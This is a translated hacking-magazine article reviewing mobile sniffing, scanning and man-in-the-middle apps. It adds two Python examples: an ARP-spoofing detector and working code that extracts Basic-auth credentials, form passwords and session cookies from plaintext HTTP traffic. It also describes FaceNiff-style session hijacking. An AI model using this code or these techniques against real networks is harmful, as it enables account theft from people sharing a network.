This article was published in “Xakep” #165 magazine.
Original Russian version - PDF
Combat Smartphone
A smartphone equipped with hacking tools? Until recently, we would have said such a thing didn’t exist. It was only possible to run familiar attack tools on something like Maemo. However, many tools have now been ported to iOS and Android, and some hack tools have been specially written for mobile environments. Can a smartphone replace a laptop in penetration testing? We decided to find out.
How to Turn Your iOS/Android Device into a Hacking Tool
Android
Android is a popular platform not only with everyday users but also with the technically inclined. The number of useful tools is overwhelming, thanks to the system's UNIX roots, which made porting many tools to Android much easier. Unfortunately, some of them are not allowed on the Google Play Store, so you will have to sideload the APKs yourself. Some tools also require root access (the iptables firewall, for example, and any sniffer that needs a raw socket), so make sure you have root beforehand. Each manufacturer uses its own technology for this, but finding instructions is easy: a good collection of HOWTOs can be found on LifeHacker, and if your model is not there, the XDA-Developers forum has information on almost any Android phone. Keep in mind that a rooted phone full of sideloaded APKs is a soft target in its own right, so keep it separate from the device that carries your real accounts. That said, some of the tools described below work even without root.
BotBrew
BotBrew is an unusual package manager. The developers call it “utilities for superusers,” and this is not far from the truth. After installing BotBrew, you get a repository from which you can download a vast number of tools compiled for Android. These include Python and Ruby interpreters for running various tools written in these languages, the tcpdump sniffer and Nmap scanner for network analysis, Git and Subversion for version control systems, and much more.
PIPS
PIPS is a specially adapted, albeit unofficial, port of the Nmap scanner to Android. It lets you quickly find active devices on the network, determine their operating systems with Nmap's fingerprinting options, scan ports, and in general do everything Nmap can do.
Fing
Fing is a network scanner which, unlike the Nmap port, has an interface designed for a phone. It scans the network quickly, fingerprints the hosts, and shows every device found, categorized by type (router, desktop, iPhone and so on). For each host you can view its open ports and connect to services such as FTP with the built-in client.
NetAudit
NetAudit works on any Android device, rooted or not, and lets you quickly identify devices on the network and check them against a large fingerprinting database to determine the operating system and the CMS running on web servers.
Net Tools
Net Tools is an indispensable toolbox for system administrators, with more than 15 utilities for network diagnostics, including ping, traceroute, arp, dns, netstat and route.
Shark for Root
Shark for Root is a tcpdump-based sniffer that writes everything it captures to a pcap file, which you can then analyze with familiar tools such as Wireshark or NetworkMiner. As the name says, it needs root, because capturing requires a raw socket. It is mostly useful for looking at your own traffic, which makes it a good way to see what the programs you installed from dubious repositories are actually sending.
FaceNiff
FaceNiff is one of the most infamous Android hacking tools: it intercepts and takes over the web sessions it sees on the local network. After sideloading the APK, you can run it on almost any rooted Android phone to hijack accounts on Facebook, Twitter, VKontakte and other services. It works by ARP spoofing the other hosts' traffic through the phone and lifting session cookies from it, so it only works against unencrypted (plain HTTP) connections; HTTPS defeats it.
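The two mechanisms above, a sniffer that writes pcap files and a tool that poisons ARP, meet in the capture file: the poisoning FaceNiff does is visible in a Shark for Root dump as a second MAC claiming an IP that already had one. The following is an added example written for this article, not code from Shark for Root, FaceNiff or the magazine: a minimal classic-pcap writer and reader, an ARP frame builder, and a detector that flags conflicting IP-to-MAC bindings. The sample traffic (gateway 192.168.1.1, victim 192.168.1.10, and the MAC addresses) is constructed here and does not come from a real network.

```python
import struct

PCAP_MAGIC = 0xA1B2C3D4          # classic microsecond-resolution pcap magic
LINKTYPE_ETHERNET = 1
ETHERTYPE_ARP = 0x0806
ARP_REQUEST, ARP_REPLY = 1, 2

# Constructed sample addresses, not taken from any real network.
GATEWAY_MAC, VICTIM_MAC, ATTACKER_MAC = "aa:aa:aa:aa:aa:01", "bb:bb:bb:bb:bb:02", "cc:cc:cc:cc:cc:03"
GATEWAY_IP, VICTIM_IP = "192.168.1.1", "192.168.1.10"


def mac_bytes(mac):
    return bytes(int(octet, 16) for octet in mac.split(":"))


def ip_bytes(ip):
    return bytes(int(octet) for octet in ip.split("."))


def fmt_mac(raw):
    return ":".join(f"{b:02x}" for b in raw)


def fmt_ip(raw):
    return ".".join(str(b) for b in raw)


def arp_frame(opcode, sender_mac, sender_ip, target_mac, target_ip):
    """Ethernet II frame carrying an RFC 826 ARP packet. Requests go to the
    broadcast address with a zeroed target MAC, as real stacks send them."""
    eth_dst = "ff:ff:ff:ff:ff:ff" if opcode == ARP_REQUEST else target_mac
    tha = "00:00:00:00:00:00" if opcode == ARP_REQUEST else target_mac
    eth = mac_bytes(eth_dst) + mac_bytes(sender_mac) + struct.pack("!H", ETHERTYPE_ARP)
    arp = (struct.pack("!HHBBH", 1, 0x0800, 6, 4, opcode)   # htype, ptype, hlen, plen, op
           + mac_bytes(sender_mac) + ip_bytes(sender_ip)
           + mac_bytes(tha) + ip_bytes(target_ip))
    return eth + arp


def write_pcap(frames):
    """Serialize frames as a classic pcap file: 24-byte global header followed by
    16-byte record headers. This is what tcpdump-based sniffers write."""
    header = struct.pack("!IHHiIII", PCAP_MAGIC, 2, 4, 0, 0, 65535, LINKTYPE_ETHERNET)
    records = [struct.pack("!IIII", i, 0, len(f), len(f)) + f for i, f in enumerate(frames)]
    return header + b"".join(records)


def read_pcap(data):
    """Return [(ts_sec, frame), ...]. The byte order is inferred from the magic,
    since pcap writers use their native order."""
    for endian in ("!", "<"):
        if struct.unpack(endian + "I", data[:4])[0] == PCAP_MAGIC:
            break
    else:
        raise ValueError("not a classic pcap file")
    if struct.unpack(endian + "I", data[20:24])[0] != LINKTYPE_ETHERNET:
        raise ValueError("only Ethernet captures are handled here")
    offset, frames = 24, []
    while offset + 16 <= len(data):
        ts_sec, _usec, incl_len, _orig = struct.unpack(endian + "IIII", data[offset:offset + 16])
        offset += 16
        frames.append((ts_sec, data[offset:offset + incl_len]))
        offset += incl_len
    return frames


def parse_arp(frame):
    """Return (opcode, eth_src, sender_mac, sender_ip), or None if not ARP."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETHERTYPE_ARP:
        return None
    opcode = struct.unpack("!H", frame[20:22])[0]
    return opcode, fmt_mac(frame[6:12]), fmt_mac(frame[22:28]), fmt_ip(frame[28:32])


def detect_arp_spoofing(frames):
    """Flag an IP claimed by a second MAC, and ARP sender MACs that differ from
    the Ethernet source. The first binding seen is trusted, so run this on a
    capture that starts before the attacker does."""
    bindings, alerts = {}, []
    for index, (_ts, frame) in enumerate(frames):
        parsed = parse_arp(frame)
        if parsed is None:
            continue
        opcode, eth_src, sender_mac, sender_ip = parsed
        if eth_src != sender_mac:
            alerts.append((index, sender_ip, f"ARP sender {sender_mac} != frame source {eth_src}"))
        known = bindings.setdefault(sender_ip, sender_mac)
        if known != sender_mac:
            kind = "reply" if opcode == ARP_REPLY else "request"
            alerts.append((index, sender_ip, f"{sender_ip} was {known}, now claimed by {sender_mac} ({kind})"))
    return alerts


def demo_capture():
    """Constructed traffic: a normal ARP exchange, then the attacker poisons the
    victim (claiming the gateway's IP) and the gateway (claiming the victim's)."""
    return write_pcap([
        arp_frame(ARP_REQUEST, VICTIM_MAC, VICTIM_IP, GATEWAY_MAC, GATEWAY_IP),
        arp_frame(ARP_REPLY, GATEWAY_MAC, GATEWAY_IP, VICTIM_MAC, VICTIM_IP),
        arp_frame(ARP_REPLY, ATTACKER_MAC, GATEWAY_IP, VICTIM_MAC, VICTIM_IP),
        arp_frame(ARP_REPLY, ATTACKER_MAC, VICTIM_IP, GATEWAY_MAC, GATEWAY_IP),
    ])


if __name__ == "__main__":
    for index, _ip, message in detect_arp_spoofing(read_pcap(demo_capture())):
        print(f"frame {index}: {message}")
```

Run against the constructed dump it reports two alerts, frames 2 and 3, one per poisoned host. On a real Shark for Root file replace demo_capture() with the file contents; the detector trusts the first binding it sees, so a dump that begins after the poisoning started will report the attacker's MAC as the legitimate one and the real gateway as the intruder, which is still a useful signal but needs reading the other way round.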
iOS
iOS is also popular with security tool developers. On Apple devices, however, a jailbreak is almost always needed to get root access. Fortunately, jailbreaks are available even for the latest firmware versions. Along with full access you get the alternative package manager Cydia, which already carries many useful tools.
MobileTerminal
MobileTerminal is a terminal emulator that supports multiple terminals, gestures for control (e.g., for sending <Ctrl + C>), and is overall very well-designed.
Pirni & Pirni Pro
Pirni is the first full-fledged sniffer for iOS. Because the iPhone's Wi-Fi chipset cannot be put into promiscuous mode, it uses classic ARP spoofing to pull the other hosts' traffic through the device. Pirni Pro, the advanced version, adds a graphical interface and can parse HTTP traffic on the fly, automatically pulling out interesting data such as login credentials with regular expressions you set in its settings.
Intercepter-NG (console edition)
Intercepter-NG is a well-known sniffer that now has a console edition for iOS and Android. It grabs passwords for a range of protocols, intercepts instant-messenger conversations and reconstructs files from traffic. It also includes network scanning and a solid ARP poisoning implementation.
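What Pirni Pro's regular expressions and Intercepter-NG's password grabber do with a plaintext HTTP stream is mechanical once the stream is in hand: split it into requests, then look in the places credentials travel. The following is an added example written for this article, not code from Pirni, Intercepter-NG or the magazine. It handles the three cases that matter most on a LAN, Basic authentication headers, form logins sent as application/x-www-form-urlencoded, and session cookies (the thing a FaceNiff-style hijack actually needs). The field and cookie names it looks for, the hosts router.lan and example.com, and the sample requests are all constructed assumptions; a real tool keeps a much longer list.

```python
import base64
import re
from urllib.parse import parse_qs

# Assumed field and cookie names worth grabbing; extend per target.
USER_KEYS = ("user", "username", "login", "email", "uid")
PASS_KEYS = ("pass", "password", "passwd", "pwd")
SESSION_COOKIES = ("PHPSESSID", "JSESSIONID", "sessionid", "sid", "remixsid")

REQUEST_LINE = re.compile(rb"^(GET|POST|PUT) (\S+) HTTP/1\.[01]$")
CONTENT_LENGTH = re.compile(rb"(?im)^content-length:[ \t]*(\d+)\r?$")


def split_requests(stream):
    """Cut a reassembled client-to-server TCP stream into (head, body) pairs,
    using Content-Length to find where a POST body ends."""
    requests, pos = [], 0
    while pos < len(stream):
        head_end = stream.find(b"\r\n\r\n", pos)
        if head_end == -1:
            break
        head = stream[pos:head_end]
        match = CONTENT_LENGTH.search(head)
        body_len = int(match.group(1)) if match else 0
        body_start = head_end + 4
        requests.append((head, stream[body_start:body_start + body_len]))
        pos = body_start + body_len
    return requests


def parse_head(head):
    """Return (method, path, {lowercase header: value}) or None for non-HTTP data."""
    lines = head.split(b"\r\n")
    match = REQUEST_LINE.match(lines[0])
    if not match:
        return None
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower().decode()] = value.strip().decode(errors="replace")
    return match.group(1).decode(), match.group(2).decode(), headers


def extract_credentials(stream):
    """Pull Basic-auth logins, form logins and session cookies out of a plaintext
    HTTP stream. Returns (kind, where, name, secret) tuples."""
    findings = []
    for head, body in split_requests(stream):
        parsed = parse_head(head)
        if parsed is None:
            continue
        method, path, headers = parsed
        host = headers.get("host", "?")
        auth = headers.get("authorization", "")
        if auth.lower().startswith("basic "):
            try:
                user, _, password = base64.b64decode(auth[6:]).decode(errors="replace").partition(":")
                findings.append(("basic-auth", host, user, password))
            except ValueError:          # binascii.Error is a ValueError subclass
                pass
        if method == "POST" and "x-www-form-urlencoded" in headers.get("content-type", ""):
            form = {k.lower(): v[0] for k, v in parse_qs(body.decode(errors="replace")).items()}
            user = next((form[k] for k in USER_KEYS if k in form), None)
            password = next((form[k] for k in PASS_KEYS if k in form), None)
            if user is not None and password is not None:
                findings.append(("form-login", host + path, user, password))
        for name, value in re.findall(r"([^=;\s]+)=([^;]*)", headers.get("cookie", "")):
            if name in SESSION_COOKIES:
                findings.append(("session-cookie", host, name, value))
    return findings


def sample_stream():
    """Constructed client-side HTTP stream (not a real capture): a router admin
    page behind Basic auth, a form login, then a request carrying the session."""
    basic = base64.b64encode(b"admin:s3cr3t").decode()
    form = b"email=bob%40example.com&pass=hunter2"
    return (
        b"GET /admin/ HTTP/1.1\r\nHost: router.lan\r\n"
        + f"Authorization: Basic {basic}\r\n\r\n".encode()
        + b"POST /login HTTP/1.1\r\nHost: example.com\r\n"
        + b"Content-Type: application/x-www-form-urlencoded\r\n"
        + f"Content-Length: {len(form)}\r\n\r\n".encode() + form
        + b"GET /feed HTTP/1.1\r\nHost: example.com\r\n"
        + b"Cookie: lang=en; PHPSESSID=7f3a9c0d1e2b\r\n\r\n"
    )


if __name__ == "__main__":
    for finding in extract_credentials(sample_stream()):
        print(*finding)
```

The stream is the client-to-server half of one TCP connection after reassembly; on a real capture that reassembly is the hard part, which is exactly what the tools above do for you. Note that everything here stops working the moment the site moves to HTTPS, which is the practical defence against this whole class of tools.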
Ettercap-NG
Ettercap-NG is a comprehensive MITM toolkit that has been ported to iOS. The port includes etterlog, which extracts useful information, such as FTP credentials, from Ettercap's log files.
iSSH
iSSH is an SSH client that provides a secure connection and can set up SSH tunnels, which lets you route a tool's traffic through a trusted host instead of straight out over the local network.
These are just a few examples of the numerous tools available for turning your smartphone into a powerful hacking device. Whether you are using Android or iOS, with the right tools and a bit of setup, you can perform a variety of penetration testing tasks directly from your mobile device.